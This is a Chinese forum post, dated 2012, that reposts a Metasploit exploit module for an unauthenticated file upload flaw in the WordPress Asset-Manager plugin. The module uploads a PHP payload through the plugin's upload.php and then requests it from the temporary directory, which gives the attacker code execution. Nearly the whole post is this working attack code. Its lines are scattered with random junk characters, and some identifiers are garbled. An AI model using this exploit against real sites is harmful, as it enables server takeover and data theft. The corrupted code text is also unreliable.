这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
9 [ M/ A. D5 P2 o& T6 Z( P
% K& j( O$ |5 c/ j4 j# v##+ {' G" J& f9 k& Y) T* D/ S
# This file is part of the Metasploit Framework and may be subject to' `1 @ k% m% @' g x
# redistribution and commercial restrictions. Please see the Metasploit
( a2 e J- `0 ^0 x: d: T( H# Framework web site for more information on licensing and terms of use.
$ r: o) f( f+ _7 c# http://metasploit.com/framework/
7 g0 b7 W- e2 |5 h% h0 V##
0 z% Q& ?/ t2 x8 K2 |& O - ?& y7 D0 J% l' U/ n- ~& y, H
require 'msf/core'% v8 D5 p, {* R0 K8 S
require 'msf/core/exploit/php_exe'- K4 a; L( ?4 p+ D
: s5 c3 {$ J! T4 n# s1 iclass Metasploit3 < Msf::Exploit::Remote8 z9 B! v7 h# R
Rank = ExcellentRanking
0 l; v4 B0 d0 c% J / {) S7 E4 ~9 c
include Msf::Exploit::Remote::HttpClient
; [; r- h+ u/ p J$ \; C$ W include Msf::Exploit: hpEXE
. V" |' m2 S- r [$ ~1 L, S* \$ }
def initialize(info = {})
+ ]* n- f0 V7 l super(update_info(info,: V8 [ p7 ]8 o$ Y! ^3 w
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
8 J( V5 q& t. F6 b! u% {% Q 'Description' => %q{
1 f" u ~% j. B% y This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress: s C, [: |1 k. Y
plugin. By abusing the upload.php file, a malicious user can upload a file to a
9 S# X8 u7 f; Q temp directory without authentication, which results in arbitrary code execution.
$ Q( c( X& u j5 d0 M9 L },+ e2 i: Z. [( v5 q2 ]% y+ Z; c
'Author' =>% ~* h& Y: ~- H3 w
[0 f: {: ~3 k4 Z/ N* p
'Sammy FORGIT', # initial discovery
8 X/ |3 r6 t& v6 u) S 'James Fitts <fitts.james[at]gmail.com>' # metasploit module
, Q: _+ ]7 N7 B8 q ],
% C4 O% g# l0 c 'License' => MSF_LICENSE,
* z4 ]) a0 s! w, A) l7 X- h. T 'References' =>; z5 T3 K! G1 d
[& \$ o$ J! B$ Q6 F8 f
[ 'OSVDB', '82653' ],
) u4 y) B: V/ M1 o( Z. J, r4 n4 M [ 'BID', '53809' ],
8 {1 S; j& N1 ?5 e0 _2 L, ]) J [ 'EDB', '18993' ],5 I: S$ q$ |6 M
[ 'URL', 'http:// www.myhack58.com /' ]& a, h: q" _& c. m% G; m* B) B
],
) ~* N$ `1 v0 s' t, W9 B+ E 'Payload' =>
! m- Q! G. R4 t {
; ~ {2 d3 X; \3 e! q8 v 'BadChars' => "\x00",
+ t9 B6 z6 ~# Q% X8 i( ^* c1 T },5 _, A3 p1 d/ O5 q9 O& V& a) f
'Platform' => 'php',
1 D, p, a8 {' j A* } 'Arch' => ARCH_PHP,
" `- E# H9 v: `( G0 J, r& E, `4 I 'Targets' =>1 [+ H4 V, w0 H* l1 | R
[* B- W8 ?/ f- ^2 \2 `$ U: S* H; n
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],. l) x _- T* J/ A2 P
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]4 K q$ o' [" b0 R3 E$ A
],6 w* V" N' b; Q9 ~3 V
'DefaultTarget' => 0,# j; D4 \$ ?+ _" Q. O1 \
'DisclosureDate' => 'May 26 2012')) r5 E$ A' [1 n! B
' m. p; y3 a0 \ register_options(
$ {- J# X- y$ L6 b6 L' j7 S [
$ b8 l7 ~8 L7 K |' |1 z OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) S0 B. Z6 g* I
], self.class)9 ^. q. l- D) S+ z. M5 _& I( z
end
8 H% U6 y* f7 M1 o- z + D, Y' ]+ w. X5 e) j
def exploit
7 o. M3 j: v5 K5 b- C- Y' k& u uri = target_uri.path
# T( X/ T! K; ~. V3 ^ uri << '/' if uri[-1,1] != '/'
! N: Z6 c& E, b/ f peer = "#{rhost}:#{rport}"
% A- G2 M5 t# K6 }3 d" b payload_name = "#{rand_text_alpha(5)}.php"
. Q( g" G/ d5 b I' h$ G% T" h php_payload = get_write_exec_payload(:unlink_self=>true). |, m, J9 J; w2 T
. b5 d1 S8 Q4 n$ } data = Rex::MIME::Message.new# K! S$ ^) ^- U. @; \$ }8 x) U
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")6 o3 i/ N$ } G0 `( `
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
" x8 D4 l1 l- I% g0 C9 y 8 Z2 E; @) b/ R: w/ [2 i2 U+ A" _
print_status("#{peer} - Uploading payload #{payload_name}")8 \7 `* D% h' c: X( w5 g9 z/ F2 x6 |
res = send_request_cgi({2 L) d! z( R* h
'method' => 'POST',
- _, x# i2 x: B0 {: \6 _5 F( {4 q 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
2 d/ O" J0 o3 s# a7 P 'ctype' => "multipart/form-data; boundary=#{data.bound}",
6 R% Y- X2 U. J8 D 'data' => post_data
8 c1 c/ [7 r2 N3 g( W })
0 z# Q" G) i* f M& ?
) ]0 D5 P1 u9 X/ H- G if not res or res.code != 200 or res.body !~ /#{payload_name}/
4 w. s3 Y1 t) o' I fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; V* `2 W3 T) Q" h0 ^: V% y2 Z4 ?end; \6 `) b( F+ u9 w U9 l
, c3 s* t; n/ }+ q3 L; N1 | print_status("#{peer} - Executing payload #{payload_name}")/ D, @* m0 k7 k2 M) [5 M
res = send_request_raw({
0 s$ _+ |, d. Q% K% _ 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
5 j* y$ w4 L1 ^- }" u 'method' => 'GET'
) `1 C! x6 q. a4 O w3 U$ s3 k })
3 E9 f( u0 \4 i4 b( P0 w+ H
5 K9 ?% X$ B8 ^* O# p4 U if res and res.code != 200* u7 m) u1 K9 `7 s3 s
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
8 Y" b6 W5 `/ `" K end& a1 L5 h/ }" W' R$ O
end% Y; T. ~: U+ Q/ y
end
5 ?+ C) `8 [) | |
发表于 2012-12-31 09:22:33
收藏
支持
反对